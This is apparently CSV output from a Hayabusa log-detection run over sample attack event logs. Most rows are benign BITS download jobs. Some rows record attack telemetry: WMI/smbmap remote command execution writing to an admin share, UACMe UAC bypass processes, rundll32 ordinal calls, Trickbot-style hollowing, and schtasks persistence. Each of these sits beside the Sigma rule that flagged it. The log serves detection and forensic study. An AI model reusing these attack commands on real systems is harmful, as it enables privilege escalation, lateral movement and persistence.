+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx -2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : 
Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process 
Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML 
C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 
4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: 
http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 